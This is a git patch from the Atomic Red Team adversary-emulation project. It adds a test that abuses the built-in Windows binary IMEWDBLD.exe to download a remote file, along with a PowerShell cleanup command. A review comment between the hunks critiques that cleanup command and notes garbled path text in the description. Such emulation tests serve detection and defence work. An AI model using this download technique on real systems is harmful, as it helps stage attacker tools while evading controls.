From ba0b1a3c355bd9a6722a6fa2ba093121d5eabfce Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Thu, 9 Sep 2021 18:02:46 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/windows-index.md | 1 +
 atomics/Indexes/index.yaml | 26 +++++++++++
 atomics/T1105/T1105.md | 45 +++++++++++++++++++
 6 files changed, 75 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 1b382326..6ff36ad2 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -920,6 +920,7 @@ command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows
 command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
 command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
 command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 7ac2c803..e453dcab 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -550,6 +550,7 @@ command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a U
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
 command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
 command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index fb91be3d..011d4200 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1619,6 +1619,7 @@
 - Atomic Test #14: whois file download [linux, macos]
 - Atomic Test #15: File Download via PowerShell [windows]
 - Atomic Test #16: File download with finger.exe on Windows [windows]
+ - Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
 - Atomic Test #1: Connection Proxy [macos, linux]
 - Atomic Test #2: Connection Proxy for macOS UI [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 78b21bdb..d585c6dd 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -982,6 +982,7 @@
 - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
 - Atomic Test #15: File Download via PowerShell [windows]
 - Atomic Test #16: File download with finger.exe on Windows [windows]
+ - Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
 - Atomic Test #3: portproxy reg key [windows]
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index b7e62028..42ed6fd1 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -67202,6 +67202,32 @@ command-and-control:
 command: 'finger base64_filedata@#{remote_host}
 '
+ - name: Download a file with IMEWDBLD.exe
+ auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2
+ description: |
+ Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
+ Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]." or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]..
+ Run "Get-ChildItem -Path C:\Users\\AppData\Local\Microsoft\Windows\INetCache\ -Include * -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.
+ supported_platforms:
+ - windows
+ input_arguments:
+ remote_url:
+ description: Location of file to be downloaded.
+ type: url
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml
+ file_name:
+ description: Name of the file to be downloaded without extension.
+ type: string
+ default: T1105
+ executor:
+ command: |
+ $imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
+ & $imewdbled #{remote_url}
+ cleanup_command: "$inetcache = $env:LOCALAPPDATA + \"\\Microsoft\\Windows\\INetCache\\\"
+ \n$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include
+ #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)\ncmd.exe
+ /c \"del $file_to_be_removed\"\n"
+ name: powershell
 T1090.001:
 technique:
 external_references:
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index f07bebc5..bcb6dc73 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -36,6 +36,8 @@
 - [Atomic Test #16 - File download with finger.exe on Windows](#atomic-test-16---file-download-with-fingerexe-on-windows)
+- [Atomic Test #17 - Download a file with IMEWDBLD.exe](#atomic-test-17---download-a-file-with-imewdbldexe)
+
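Review bot: The `cleanup_command` value added in this hunk interpolates a `[string[]]` array into one `del` argument, `cmd.exe /c "del $file_to_be_removed"`, so when several files match `#{file_name}*` their paths are space-joined onto a single command line, any path containing a space is split into separate arguments, and when nothing matches `del` runs with no argument at all; piping the lookup straight into the remover avoids all three cases: `Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue | Remove-Item -Force -ErrorAction SilentlyContinue`. The description text is also garbled: `C:\Users\\AppData` has lost the username placeholder between the two backslashes, and the first cache path opens with `"` but closes with a backtick. The same command and text reappear in the T1105.md hunk below; since both files are emitted by the doc generator named in the commit subject, the fix belongs in the source atomic YAML for T1105 rather than in these generated copies.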
@@ -663,4 +665,47 @@ finger base64_filedata@#{remote_host}
+
+
+
+## Atomic Test #17 - Download a file with IMEWDBLD.exe
+Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
+Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]." or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]..
+Run "Get-ChildItem -Path C:\Users\\AppData\Local\Microsoft\Windows\INetCache\ -Include * -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1a02df58-09af-4064-a765-0babe1a0d1e2
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_url | Location of file to be downloaded. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml|
+| file_name | Name of the file to be downloaded without extension. | string | T1105|
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
+& $imewdbled #{remote_url}
+```
+
+#### Cleanup Commands:
+```powershell
+$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\"
+$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
+cmd.exe /c "del $file_to_be_removed"
+```
+
+
+
+